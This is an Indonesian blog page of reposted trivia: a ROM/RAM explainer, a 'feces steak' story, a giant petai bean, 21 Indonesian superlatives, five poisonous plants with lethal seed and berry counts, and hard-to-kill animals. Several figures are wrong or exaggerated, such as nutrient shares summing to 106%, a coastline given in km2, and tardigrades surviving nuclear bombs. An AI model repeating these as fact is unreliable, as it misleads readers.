Read Only Memory (ROM), berfungsi untuk menyimpan pelbagai program yang berasal dari pabrik komputer. Sesuai dengan namanya, ROM (Read Only Memory), maka program yang tersimpan didalam ROM, hanya bisa dibaca oleh parapemakai.
Random Access Memory (RAM), merupakan bagian memory yang bisa digunakan oleh para pemakai untuk menyimpan program dan data.
ROM bisa diibaratkan sebuah tulisan yang sudah tercetak, dimana pemakai hanya bisa melakukan pembacaan data yang ada didalamnya tanpa bisa melakukan perubahan apapun pada tulisan yang ada. ROM biasanya berisi instruksi/program khusus yang bisa digunakan pemakai untuk memanfaatkan komputer secara maksimal.
RAM berfungsi untuk menyimpan program dan data dari pemakai komputer dalam bentuk pulsa-pulsa listrik, sehingga seandainya listrik yang ada dimatikan, maka program dan data yang tersimpan akan hilang. ROM menyimpan program yang berasal dari pabrik dalam bentuk komponen padat, sehingga tidak akan mengalami gangguan seandainya aliran listrik terputus. Isi RAM bisa dihapus oleh pemakai komputer, isi ROM tidak.
Secara pisik, RAM berbentuk seperti sebuah chip yang sangat kecil, dan saat ini mampu menyimpan data antara 8 MB hingga 32 GB. Apabila pemakai komputer ingin menambah kapasitas memory yang dimilikinya, pemakai tinggal menambahkan chip RAM pada tempat yang telah disediakan (chip-set).
Jika sebuah PC dinyalakan, program yang ada didalam ROM segera mencari lokasi yang digunakan untuk menyimpan operating system apakah terdapat pada disket ataupun harddisk. Jika diketemukan, maka OS ini segera dipindahkan kedalam RAM. Tahap ini dikenal sebagai boot-up. Untuk selanjutnya, program-program aplikasi seperti misalnya: Windows dan lainnya juga dipindahkan kedalam RAM, dan kini komputer siap digunakan oleh pemakai.
Dengan demikian, semakin besar program-program yang digunakan, semakin besar pula tempat yang harus disediakan oleh RAM.
RAM terbagi menjadi: Input Area, Program Area, Working Area, Output Area. ROM biasanya berisi: Program BIOS (Basic Input Output System), program ini berfungsi untuk mengendalikan perpindahan data antara microprocessor kekomponen lain yang meliputi keyboard, monitor, printer dan lainnya. Program BIOS juga mempunyai fungsi untuk self-diagnostik, atau memeriksa kondisi yang ada didalam dirinya. Program Linkage/Bootstrap, bertugas untuk memindahkan operating system yang tersimpan didalam disket untuk kemudian ditempatkan didalam RAM.
Misalnya, dengan memberi instruksi “SIMPAN” pada sebuah file MS-Word, maka sinyal ini segera dikirm ke-operating sistem. OS segera memeriksa apakah file yang ada benar-benar dapat disimpan, misalnya: nama file sudah benar, disket yang digunakan tidak dalam posisi “read-only” dan sebagainya. Jika semua sudah benar, maka OS segera menggerakkan peralatan yang ada untuk menyimpan file yang bersangkutan dibawah pengawasan BIOS.

Di Tokyo, Ada Steak yang Terbuat dari Kotoran Manusia! sumber : http://www.klikunic.com/2011/07/di-tokyo-ada-steak-yang-terbuat-dari.html#ixzz1RxyNngFu

Steak daging sapi pasti semua orang sudah bisa membayangkan nikmatnya. Tapi bagaimana dengan steak feses alias kotoran manusia? Beranikah Anda menyantapnya?
Ilmuwan asal Jepang berhasil menciptakan steak berbahan feses tersebut. Adalah Mitsuyuki Ikeda dari Okayama Laboratory yang menciptakan steak langka itu. Ia tak cuma iseng sebab inovasinya adalah respons dari masalah yang dihadapi Tokyo Sewage, badan pengelola limbah kota Tokyo.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT4LivhCkUoX-BujApDoUmOiHl6AhIwTe3lc7o-_hN3CToTkooGfyFdKN89XReWVpTyhfYs1n9l-C20cAid7q7XjzsFb7yxsrN6idv_Pzvj6BIdjGhvtymeba8ogasDm8VZ1pFEIWGnNxa/s400/meat-steak.jpg

Populasi manusia menimbulkan akumulasi lumpur limbah mengandung feses yang berlebihan. Kandungan protein yang tinggi dalam lumpur limbah jadi pemicu munculnya ide langka Ikeda. Ia lalu mengekstrak protein dan menambahkan pemercepat reaksi serta melakukan pemrosesan hingga steak feses itu pun tercipta.
Agar tampak seperti daging sapi, Ikeda pun menambahkan pewarna makanan. Setelah dianalisa, ternyata kandungan gizi steak feses tergolong tinggi, terdiri dari 63% protein, 31% karbohidrat, 3% lemak, dan 9% mineral. Beberapa orang yang terlibat dalam uji cita rasa awal juga mengatakan bahwa rasa steak feses ini pun seperti daging sapi betulan.
Ikeda mengakui, ada beberapa masalah yang harus diselesaikan sebelum steak ini bisa dimakan. Pertama adalah soal biaya sebab harga steak ini mencapai 10 hingga 20 kali lipat dari steak biasa. Masalah yang paling utama juga rasa jijik saat mengetahui bahan baku steak feses.



Cara agar harga bisa ditekan akan terus dilakukan. Sementara, untuk masalah jijik, Ikeda berharap masyarakat bisa melupakan dan melihat kemungkinan menyelesaikan masalah lingkungan dengan memakan steak feses.
Steak feses tidak cuma menyelesaikan masalah limbah, tetapi juga rantai industri daging yang menyumbang 18% emisi gas rumah kaca dan masalah perlakuan keji yang sering dialami hewan.
Sumber: Kompas






sumber :http://unik.bloggermu.com/2011/06/di-tokyo-ada-steak-yang-terbuat-dari.html

Penemuan Petai Gergasi, Petai terbesar di Dunia

Satu unting buat petai mungkin cukup untuk membuat sambel Petai untuk satu mangkok, Tapi kalo satu unting petai ini, mungkin bisa untuk membuat sambel petai untuk hajatan satu kampung. Bagaimana tidak, petai ini mempunyai ukuran super besar, panjangnya hingga satu setengah meter dengan berat buah mencapai 4 kilogram.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4WIbUUxJZOjv9kMpzpixXHyKKHrQU5ZXuCYb77uLNn2Y4-r-t5yQfuKLhe2cn-G0Hy_roxyrfKoZvKmDajOpIzdHDn9Q3YxyeCrL-SEnUznduMRzr-LGgAAz3aIblKre6-DElaYI6I9M/s1600/agus.jpg

Petai ini namanya Petai Gergasi, ditemukan oleh salah seorang penduduk Malaysia di hutan Grik wilayah Perak malaysia. Sontak berita penemuan Petai terbesar ini membuat heboh seluruh Malaysia dan menjadi Headline news di berbagai surat kabar malaysia. gambar di atas diperoleh dari salah satu surat Kabar Malaysia bernama Star minggu.

Sumber

21 Hal yang Membanggakan Indonesia di Mata Dunia

Info ini bisa membangkitkan nilai nasionalisme kita. Karena ternyata di tengah-tengah ‘kemirisan’ yang dihadapi terhadap bangsa ini, Annida membaca [link] yang sangat membanggakan. Ternyata Indonesia memiliki banyak sekali kelebihan yang sayang untuk dibiarkan begitu saja, kelebihan itu yaitu :


1.Republik Indonesia merupakan Negara kepulauan terbesar di dunia
yang terdiri dari 17.504 pulau (termasuk 9.634 pulau yang belum diberi nama dan 6.000 pulau yang tidak berpenghuni) . Disini ada 3 dari 6 pulau terbesar didunia, yaitu : Kalimantan (pulau terbesar ketiga di dunia dgn luas 539.460 km2), Sumatera (473.606 km2) dan Papua (421.981 km2).


2. Indonesia adalah Negara maritim terbesar di dunia
dengan perairan seluas 93 ribu km2 dan panjang pantai sekitar 81 ribu km2 atau hampir 25% panjang pantai di dunia.


3. Pulau Jawa adalah pulau terpadat di dunia dimana sekitar 60% hampir penduduk Indonesia (sekitar 130 jt jiwa) tinggal di pulau yang luasnya hanya 7% dari seluruh wilayah RI.
* Indonesia merupakan Negara dengan suku bangsa yang terbanyak di dunia. Terdapat lebih dari 740 suku bangsa/etnis, dimana di Papua saja terdapat 270 suku.

4. Negara dengan bahasa daerah yang terbanyak,
yaitu, 583 bahasa dan dialek dari 67 bahasa induk yang digunakan berbagai suku bangsa di Indonesia. Bahasa nasional adalah bahasa Indonesia walaupun bahasa daerah dengan jumlah pemakai terbanyak di Indonesia adalah bahasa Jawa.


5. Monumen Budha (candi) terbesar di dunia
adalah Candi Borobudur di Jawa Tengah dengan tinggi 42 meter (10 tingkat) dan panjang relief lebih dari 1 km. Diperkirakan dibuat selama 40 tahun oleh Dinasti Syailendra pada masa kerajaan Mataram Kuno (750-850).


6. Tempat ditemukannya manusia purba tertua di dunia,
yaitu : Pithecanthropus Erectus yang diperkirakan berasal dari 1,8 juta tahun yang lalu.


7.Republik Indonesia adalah Negara pertama yang lahir sesudah berakhirnya Perang Dunia II pada tahun 1945. RI merupakan Negara ke 70 tertua di dunia.


8.Indonesia adalah Negara pertama (hingga kini satu-satunya) yang pernah keluar dari Perserikatan Bangsa Bangsa (PBB)
pada tgl 7 Januari 1965. RI bergabung kembali ke dalam PBB pada tahun 1966.


9.Tim bulutangkis Indonesia adalah yang terbanyak merebut lambing supremasi bulutangkis pria, Thomas Cup, yaitu sebanyak 13 x (pertama kali th 1958 & terakhir 2002).


10. Indonesia adalah penghasil gas alam cair (LNG) terbesar di dunia
(20% dari suplai seluruh dunia) juga produsen timah terbesar kedua.


11. Indonesia menempati peringkat 1 dalam produk pertanian,
yaitu : cengkeh (cloves) & pala (nutmeg), serta no.2 dalam karet alam (Natural Rubber) dan minyak sawit mentah (Crude Palm Oil).

12. Indonesia adalah pengekspor terbesar kayu lapis
(plywood), yaitu sekitar 80% di pasar dunia.


13. Terumbu Karang (Coral Reef) Indonesia adalah yang terkaya (18% dari total dunia).


14. Indonesia memiliki species ikan hiu terbanyak didunia yaitu 150 species.


15. Biodiversity Anggrek terbeser didunia :
6 ribu jenis anggrek, mulai dari yang terbesar (Anggrek Macan atau Grammatophyllum Speciosum) sampai yang terkecil (Taeniophyllum, yang tidak berdaun), termasuk Anggrek Hitam yang langka dan hanya terdapat di Papua.


16. Memiliki hutan bakau terbesar di dunia.
Tanaman ini bermanfaat ntuk mencegah pengikisan air laut/abrasi.


17. Binatang purba yang masih hidup
: Komodo yang hanya terdapat di pulau Komodo, NTT adalah kadal terbesar di dunia. Panjangnya bias mencapai 3 meter dan beratnya 90 kg.


18. Rafflesia Arnoldi yang tumbuh di Sumatera adalah bunga terbesar di dunia.
Ketika bunganya mekar, diameternya mencapai 1 meter.

19. Memiliki primata terkecil di dunia ,
yaitu Tarsier Pygmy (Tarsius Pumilus) atau disebut juga Tarsier Gunung yang panjangnya hanya 10 cm. Hewan yang mirip monyet dan hidupnya diatas pohon ini terdapat di Sulawesi.


20. Tempat ditemukannya ular terpanjang di dunia
yaitu, Python Reticulates sepanjang 10 meter di Sulawesi.


21.Ikan terkecil di dunia
yang ditemukan baru-baru ini di rawa-rawa berlumpur Sumatera. Panjang 7,9 mm ketika dewasa atau kurang lebih sebesar nyamuk. Banyak kan kelebihannya? tinggal cara mengolah dan memeliharanya saja yang harus di dukung dengan kepercayaan diri yang hebat untuk memakai produk kita sendiri.

sumber: http://dunia-panas.blogspot.com/2010/07/21-yang-membanggakan-indonrsia-di-mata.html

5 Tanaman Paling Beracun

Racun bisa ditemukan atau terkandung di mana saja, salah satunya terdapat di dalam tanaamn. Ini dia 5 tanaman yang diketahui paling beracun.

Banyak orang tidak tahu tanaman apa saja yang mengandung racun dan bisa berbahaya bagi tubuh. Seperti dikutip dari Howstuffworks, ada 5 tanaman yang diketahui paling beracun, yaitu:

1. Oleander

Tanaman oleander atau Nerium oleander dianggap sebagai tanaman paling beracun di dunia. Karena seluruh bagian tanaman mengandung racun dan terdiri dari beberapa jenis racun. Tapi racun yang paling berbahaya adalah oleandrin dan neriine yang bisa berefek kuat pada jantung.


Meski demikian tanaman ini sering digunakan sebagai dekorasi dan berasal dari daerah mediterania dengan tinggi mencapai 1,8-5,4 meter.

Jka menelan daun yang mengandung racun ini akan menimbulkan gejala diare, muntah, sakit perut hebat, mengantuk, pusing, denyut jantung tidak teratur serta kematian. Jika korban ditolong sebelum 24 jam, maka peluang untuk selamatnya tinggi. Biasanya pasien didorong untuk muntah dengan memompa perutnya atau mengonsumsi arang aktif untuk menyerap racun.

2. Water Hemlock

Tanaman water hemlock atau Cicuta maculata adalah tanaman yang menarik dengan daun ungu bergaris-garis putih serta berbuah kecil. Tanaman ini berasal dari Amerika Utara dengan tinggi mencapai 1,8 meter serta tumbuh subur di sepanjang tepi sungai, rawa, dataran rendah dan padang rumput yang basah.


Racun yang terkandung dalam tanaman ini disebut dengan cicutoxin yang ada diseluruh tanaman dan paling terkonsentrasi di akar. Racun ini menyebabkan kejang yang kaku dan menyakitkan, mual, muntah, kram dan tremor (gemetar) otot. Kalaupun selamat dari racun ini biasanya akan menderita amnesia.

3. Rosary Pea (tanaman saga)
Tanaman rosary pea atau Abrus precatorius adalah benih yang cantik dilihat dengan perpaduan warna merah dan hitam, sehingga sering digunakan untuk perhiasan. Benih ini mengandung racun abrin dan akan berbahaya jika lapisan benih rusak atau tergores. Karenanya pembuat perhiasan lebih rentan terkena racun dibanding pemakainya. Tanaman ini bisa mencapai tinggi 20 meter dan menyebar di seluruh negara terutama negara beriklim tropis dan sub-tropis.


Racun abrin ini lebih mematikan dibanding ricin, karena kurang dari 3 mikrogram abrin atau tidak sampai satu benih sudah cukup mematikan. Gejala keracunan yang muncul adalah sulit bernapas, demam, mual, ada cairan di paru-paru. Jika benih tersebut tertelan bisa menyebabkan mual, muntah, dehidrasi, gagal ginjal, hati dan limpa. Kematian biasanya terjadi dalam waktu 3-5 hari.

4. Deadly Nightshade (Kecubung)

Deadly nightshade atau Atropa belladonna mengandung racun atropine dan scopolamine di dalam batang, daun, buah dan akar. Tanaman ini tumbuh setinggi 0,6-1,2 meter dengan daun hijau gelap dan berbentuk lonceng ungu. Bunganya akan mekar di pertengahan musim panas. Hanya ditemui pada beberapa wilayah di dunia.


Racun yang ada bisa mempengaruhi sistem saraf. Pada dosis yang cukup, racun akan melumpuhkan ujung saraf dari otot seperti pembuluh darah, jantung dan otot gastrointestinal. Gejala keracunan yang timbul adalah pupil membesar atau melebar, lebih peka terhadap cahaya, penglihatan kabur, sakit kepala, kebingungan dan kejang. Menelan 2 buah ini bisa membunuh seorang anak, jika 10-20 buah bisa membunuh seorang dewasa.

5. Castor Bean (Jarak)

Tanaman castor bean atau dikenal dengan Ricinus communis secara luas dibudidayakan untuk castor oil dan juga sebagai tanaman hias. Pada kenyataannya tanaman ini mengandung racun mematikan yang disebut dengan ricin. Dulunya tanaman ini banyak ditemukan di Afrika, tapi sekarang bisa ditemukan di seluruh dunia. Tanaman ini tumbuh dengan baik di daerah tandus dan tidak memerlukan perawatan khusus.


Sebagian besar ricin terkonsentrasi di lapisan benih, karenanya mengonsumsi 3 benih tanaman ini sudah bisa mematikan seorang anak. Gejala keracunan benih ini adalah mual, kram perut, muntah, pendarahan internal, kegagalan sirkulasi dan ginjal. Selain itu debu yang menempel di benih ini juga bisa menimbulkan reaksi alergi seperti batuk, nyeri otot dan kesulitan bernapas.

sumber: http://fenz-capri.blogspot.com/2010/07/5-tanaman-paling-beracun-must-read.html

Binatang yang susah dibunuh

5 East African Giant Snail
East african giant snail mirip dgn sepupu2nya...namun bisa tumbuh sampai 8 inci

Penghuni afrika timur sudah mencoba berbagai hal untuk membunuh binatang satu ini..pestisida, racun, ..bahkan flamethrower..tp makhluk ini masih tidak bisa dibunuh

4 Water Bears
Water bears adalah binatang air yg mikroskopik..

Water bear sangat susah dibunuh..mereka bahkan tdk bs di bekukan;mereka bs tahan di kedinginan -273 celcius. Mereka juga bs tahan bom nuklir..mereka bs kembali ke bentuk kering dan saat di bentuk ini mereka kebal terhadap radiasi. Mereka juga kebal terhadap nitrogen cair dan asam mineral.
Salah satunya cara membunuh water bear adalah mengirimnya ke luar angkasa.. dan walaupun begitu mereka masih bisa hidup 10 hari!

3 Tree Weta
Tree weta adalah..binatang yg serem abisss xD

Di darah mereka ada protein spesial yg membuat air tidak bisa dibekukan..berarti walaupun tree weta dibekukan, darah mereka masih bisa mengalir saat mereka bangun.
Otak dan hati mereka juga tidak berfungsi saat mereka beku..namun mereka bisa kembali berfungsi saat cair..
Jadi mereka bisa mati..lalu hidup lagi! Kayak zombie2 Lungfish
Lungfish adalah salah satu spesies binatang air tertua

Mereka bisa hidup walaupun tidak ada air atau udara selama 6 bulan. Mereka bisa hidup kembali setelah diberi sedikit air

1 Immortal Jellyfish
Immortal berarti abadi..dan ubur2 satu ini emg abadi..alias ga bisa mati!

Ubur2 ini lahir dan berkembang seperti biasa..namun hidup mereka tidak berakhir..mereka akan kembali ke bentuk polyp (bayi ubur2) dan hidupnya mulai lagi dari awal


Sumber 

Recent Posts

comments powered by Disqus